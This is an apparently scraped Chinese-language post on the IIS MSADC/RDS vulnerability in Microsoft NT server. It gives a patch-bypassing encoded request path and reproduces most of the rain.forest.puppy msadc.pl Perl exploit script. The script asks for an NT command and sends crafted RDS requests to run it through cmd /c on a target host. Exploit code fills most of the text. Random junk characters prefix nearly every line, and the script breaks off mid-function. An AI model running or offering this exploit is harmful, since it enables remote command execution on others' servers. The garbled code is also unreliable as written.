IIS的漏洞(威胁NT之三招穿墙手) (MS,缺陷)
Bo5ZZY WW~+?g5 涉及程序:
G|\^{5 Microsoft NT server
f<A5?eKw .Vq)zi1< 描述:
Gn;@{x6 1个NT的重大漏洞造成全世界大约1/4的NT server可以被入侵者获取最高权限
&CwFdx:Ff r=c<--_@ 详细:
mqq;H} 如果你没有时间读详细内容的话,就删除:
Qv-@Zt!8 c:\Program Files\Common Files\System\Msadc\msadcs.dll
)G7=G+e; 有关的安全问题就没有了。
:W@#) 1= ." $ 微软对关于Msadc的问题发了三次以上的补丁,仍然存在问题。
jF[ 1za HNL42\Kz! 1、第一次补丁,基本上,其安全问题是MS Jet 3.5造成的,它允许调用VBA shell()函数,这将允许入侵者远程运行shell指令。
f{0F|w<gf 关于利用ODBC远程漏洞的描述,请参看:
GU Q{r!S 4Z|vnj)Z http://www.cnns.net/frankie/mirror/nttoolz/ntpipe.htm ~SSU` "`asFg 2、IIS 4.0的缺省安装设置的是MDAC1.5,这个安装下有一个/msadc/msadcs.dll的文件,也允许通过web远程访问ODBC,获取系统的控制权,这点在很多黑客论坛都讨论过,请参看
1He{v# http://www.microsoft.com/security/bulletins/MS99-025faq.asp W5#611 J~(Wf%jM~ 这里不再论述。
7^T^($+6s& zS]8V?` 3、如果web目录下的/msadc/msadcs.dll/可以访问,那么ms的任何补丁可能都没用,用类似:
7)%+=@ 67y Tvr@a /%6Dsadc/%6Dsadcs.dll/V%62BusO%62j.V%62BusO%62jCls.GetRecordset
US 的请求,就可以绕过安全机制进行非法的VbBusObj请求,从而达到入侵的目的。 下面的代码仅供测试,严禁用于非法用途,否则后果自负!!!
CkswJ:z)sc .G o{1[ F7")]q3I~ #将下面这段保存为txt文件,然后: "perl -x 文件名"
;O<9|? pStk/te,XK #!perl
h~wi6^{&Y #
5{$LsL # MSADC/RDS 'usage' (aka exploit) script
OxGE%R, #
e6_ZjrQf # by rain.forest.puppy
n&A'C\ #
^T~gEv # Many thanks to Weld, Mudge, and Dildog from l0pht for helping me
CIVnCy z # beta test and find errors!
16SOIT /s];{m|>
use Socket; use Getopt::Std;
>&!RWH9*q getopts("e:vd:h:XR", \%args);
rWh6RYd<T Cye$H9 2 print "-- RDS exploit by rain forest puppy / ADM / Wiretrip --\n";
lgpW@g OIl#DV. if (!defined $args{h} && !defined $args{R}) {
q$G,KRy/ print qq~
~8aJ S,u Usage: msadc.pl -h <host> { -d <delay> -X -v }
T;L>P[hNn -h <host> = host you want to scan (ip or domain)
Zf7&._y. -d <seconds> = delay between calls, default 1 second
Z0De!?ALV\ -X = dump Index Server path table, if available
7 h y&-< -v = verbose
[31p&FxM -e = external dictionary file for step 5
4d:{HLX, PR|R`.QSs Or a -R will resume a command session
,#W 5<L_|d)0" ~; exit;}
|y20Hi': m5G \}8| $ip=$args{h}; $clen=0; $reqlen=0; $|=1; $target="";
2&Nb if (defined $args{v}) { $verbose=1; } else {$verbose=0;}
$BmmNn# if (defined $args{d}) { $delay=$args{d};} else {$delay=1;}
-*2Mf Mh if(!defined $args{R}){ $ip.="." if ($ip=~/[a-z]$/);
NA,CZ $target= inet_aton($ip) || die("inet_aton problems; host doesn't exist?");}
c#N<"cy> if (defined $args{X} && !defined $args{R}) { &hork_idx; exit; }
_lW+>xQ !EQ@#qW/ if (!defined $args{R}){ $ret = &has_msadc;
3sCFHn#c die("Looks like msadcs.dll doesn't exist\n")if $ret==0}
4em;+ >D6 r6'UUu print "Please type the NT commandline you want to run (cmd /c assumed):\n"
E2L(wt}^ . "cmd /c ";
t:LcNlN| $in=<STDIN>; chomp $in;
VOsqJJ3 $command="cmd /c " . $in ;
p$7#}s 9z?oB&5 if (defined $args{R}) {&load; exit;}
q %A?V_ 1{_A:<VBl print "\nStep 1: Trying raw driver to btcustmr.mdb\n";
\Ep0J $ #o &try_btcustmr;
#}^-C&~ 6mH/ m& print "\nStep 2: Trying to make our own DSN...";
4x%(9_8{- &make_dsn ? print "<<success>>\n" : print "<<fail>>\n";
[#YE^[*qK n]+W 3[i print "\nStep 3: Trying known DSNs...";
kqG0%WtQ &known_dsn;
.yENM[-bQ G#Ou[*O' print "\nStep 4: Trying known .mdbs...";
t?nX=i*~] &known_mdb;
|lH;Fq{\ j'i0*"x if (defined $args{e}){
ZtVAEIZ) print "\nStep 5: Trying dictionary of DSN names...";
G,= yc@uq &dsn_dict; } else { "\nNo -e; Step 5 skipped.\n\n"; }
:ug4g6;#H0 fx8EB8A7K7 print "Sorry Charley...maybe next time?\n";
QCPID: exit;
>s3gqSDR ENh!N4vbO ##############################################################################
@xsCXCRWVV Z['\61 sub sendraw { # ripped and modded from whisker
M\b")Tu{0 sleep($delay); # it's a DoS on the server! At least on mine...
PN+G:Qv my ($pstr)=@_;
z=&z_}M8 socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp')||0) ||
\RQ='/H* die("Socket problems\n");
}Vu\(~ if(connect(S,pack "SnA4x8",2,80,$target)){
6I_Hd>4 select(S); $|=1;
N?dvuB print $pstr; my @in=<S>;
^BZkHAp select(STDOUT); close(S);
bU 63X={ return @in;
0^'B3$> } else { die("Can't connect...\n"); }}
0i[zup R6 XuA(5 ##############################################################################
=rPrPb Kt>X[o3m, sub make_header { # make the HTTP request
@&1Wyp my $msadc=<<EOT
6pE :A@ POST /msadc/msadcs.dll/AdvancedDataFactory.Query HTTP/1.1
^0W(hA User-Agent: ACTIVEDATA
52zGJ I*
Host: $ip
zm9TvoC%} Content-Length: $clen
CBf7]n0H Connection: Keep-Alive
+5v}q.:+ #$vRJ#S}U ADCClientVersion:01.06
&@"]+33 Content-Type: multipart/mixed; boundary=!ADM!ROX!YOUR!WORLD!; num-args=3
}2)DPP:ic Content-Type: application/x-varg
5sde Content-Length: $reqlen
KRsAv^'] I>h<b_y EOT
*0Gz)' ; $msadc=~s/\n/\r\n/g;
(kTXP_ return $msadc;}
$N$ FtpB <I;*[;AK ##############################################################################
U3vEdw<lV YEjY8]t sub make_req { # make the RDS request
z1 i &Ge my ($switch, $p1, $p2)=@_;
(B>Zaro# my $req=""; my $t1, $t2, $query, $dsn;
>zY \Llv dEM?~? if ($switch==1){ # this is the btcustmr.mdb query
o?Sla_D $query="Select * from Customers where City=" . make_shell();
z/ &